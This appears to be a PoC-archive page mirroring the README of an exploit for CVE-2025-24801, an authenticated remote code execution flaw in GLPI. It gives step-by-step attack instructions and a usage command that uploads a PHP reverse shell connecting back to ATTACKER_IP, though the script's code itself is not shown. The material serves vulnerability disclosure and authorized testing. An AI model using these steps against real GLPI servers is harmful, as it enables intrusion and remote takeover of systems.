Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-24801 PoC — GLPI allows authenticated remote code execution

Source
https://github.com/fatkz/CVE-2025-24801
Associated Vulnerability
Title:GLPI allows authenticated remote code execution (CVE-2025-24801)
Description:GLPI is a free asset and IT management software package. An authenticated user can upload and force the execution of *.php files located on the GLPI server. This vulnerability is fixed in 10.0.18.
Description
CVE-2025-24801 Exploit
Readme
# CVE-2025-24801 PoC for GLPI RCE

This repository contains a proof-of-concept script (`poc.py`) that exploits CVE-2025-24801, an LFI-to-RCE vulnerability in GLPI 10.0.17. It automates:

* Logging into GLPI
* Enabling `.php` uploads by updating document type settings
* Uploading a PHP reverse shell via the AJAX file upload endpoint

## 🛠️ Installation

```bash
git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
```

## 🚀 Usage

```bash
python3 poc.py \
  --url https://target.example.com/glpi \
  --user TECHNICIAN_USER \
  --password "PASSWORD" \
  --lhost ATTACKER_IP \
  --lport 4444
```

* `--url`: Base URL of the GLPI instance (e.g. `https://example.com/glpi`)
* `--user` / `--password`: Valid GLPI technician credentials
* `--lhost` / `--lport`: Attacker IP and port for the reverse shell listener

The script automatically uses `--doc-id 1` by default to update the first document type.

After execution, the script will:

1. Log in and establish a session
2. Enable `.php` uploads by updating document type ID 1
3. Upload `exploit.php` containing a PHP reverse shell payload

You will then need to manually trigger the LFI by specifying the uploaded filename in the PDF font include (e.g., via the report export feature) to achieve RCE.

## 📑 How It Works

1. **Login**: Extracts the CSRF token from `/front/login.php` and posts credentials to authenticate.
2. **Enable PHP Uploads**: Fetches `/front/documenttype.form.php?id=1`, parses the CSRF token, and adds `php` to the allowed extensions.
3. **Upload Shell**: Fetches `/front/ticket.form.php` for a CSRF token, then uses `/ajax/fileupload.php` (with `X-Requested-With: XMLHttpRequest`) to upload a PHP reverse shell.
4. **Trigger RCE**: Manually invoke the PDF font LFI by specifying the uploaded shell filename in the `pdffont` parameter during report export.

## ⚠️ Disclaimer

This tool is intended for authorized security testing and educational purposes only. Do not use it against systems without explicit permission.

---

*Created for educational and authorized pentesting purposes.*
File Snapshot

 [4.0K]  /data/pocs/94d2be6aee5264a2b6228640fdbc2ce8845e3718
├── [2.8K]  exploit.py
├── [2.1K]  README.md
└── [  40]  requirements.txt

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →